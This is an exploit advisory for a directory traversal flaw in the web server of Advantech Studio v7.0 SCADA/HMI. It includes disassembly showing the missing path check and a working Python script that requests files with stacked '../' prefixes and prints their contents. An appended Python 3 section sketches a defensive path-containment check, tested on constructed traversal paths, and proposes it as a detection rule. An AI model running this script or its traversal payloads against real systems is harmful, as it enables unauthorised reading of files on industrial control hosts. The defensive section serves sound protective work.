# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A
'''
Advantech Studio v7.0 SCADA/HMI has a built-in web server, NTWebServer.exe.
The web server is a standalone executable that is used alongside every project
to serve as a web-based management system with the help of an ActiveX control.
The flaw occurs because there is no check of any kind on the path of the requested file.
The call into function sub_401A90:
.text:00402A4A push 0 ; dwFlagsAndAttributes
.text:00402A4C push 3 ; dwCreationDisposition
.text:00402A4E push 3 ; dwShareMode
.text:00402A50 push 80000000h ; dwDesiredAccess
.text:00402A55 mov edx, [ebp+lpFileName]
.text:00402A58 push edx ; lpFileName
.text:00402A59 lea ecx, [ebp+var_1C]
.text:00402A5C call sub_401A90
sub_401A90 uses the CreateFileW function directly:
.text:00401A97 push 0 ; hTemplateFile
.text:00401A99 mov eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C push eax ; dwFlagsAndAttributes
.text:00401A9D mov ecx, [ebp+dwCreationDisposition]
.text:00401AA0 push ecx ; dwCreationDisposition
.text:00401AA1 push 0 ; lpSecurityAttributes
.text:00401AA3 mov edx, [ebp+dwShareMode]
.text:00401AA6 push edx ; dwShareMode
.text:00401AA7 mov eax, [ebp+dwDesiredAccess]
.text:00401AAA push eax ; dwDesiredAccess
.text:00401AAB mov ecx, [ebp+lpFileName]
.text:00401AAE push ecx ; lpFileName
.text:00401AAF call ds:CreateFileW
'''
import argparse
import httplib

# Upper bound on the number of "../" prefixes tried
MAX_NESTED_DIRECTORY = 32


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')
    parser.add_argument('-p')
    parser.add_argument('-f')
    args = parser.parse_args()
    if args.d is None or args.p is None or args.f is None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return
    httpConn = httplib.HTTPConnection(args.d, int(args.p))
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content = resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print'------------------------------------------'
            print content
            print'---------------------------------------EOF'
            break


def MakePath(f, count):
    # Prefix the requested file with `count` parent-directory segments
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f


if __name__ == "__main__":
    main()
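
The path check that the disassembly shows is missing before CreateFileW, sketched as an added example (Python 3, not part of the original script or of the vendor's code). The function name `resolve_in_root`, the temporary web root and the sample request paths are constructed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_in_root(web_root, request_path):
    """Map an HTTP request path to a file inside web_root, or return None."""
    # Decode once, as the server would, and treat '\' as a separator (Windows does).
    decoded = unquote(request_path).replace("\\", "/")
    # Reject NUL bytes and ':' (drive letters, NTFS alternate data streams).
    if "\x00" in decoded or ":" in decoded:
        return None
    root = os.path.realpath(web_root)
    # Canonicalise AFTER joining so "../" segments and symlinks are resolved.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Component-wise containment test; a plain startswith() would accept
    # sibling directories such as "<root>_backup".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Run the check over constructed request paths; return {path: served?}."""
    requests = ["/index.html"]
    requests += ["../" * n + "windows/system.ini" for n in (1, 4, 32)]
    requests += ["..\\..\\windows\\system.ini", "%2e%2e/%2e%2e/windows/system.ini"]
    with tempfile.TemporaryDirectory() as root:  # constructed web root
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("<html></html>")
        return {r: resolve_in_root(root, r) is not None for r in requests}


if __name__ == "__main__":
    for path, served in demo().items():
        print("SERVE " if served else "REJECT", path)
```

The same containment test doubles as a detection rule: any logged request path for which it returns None while containing `..` segments is worth alerting on.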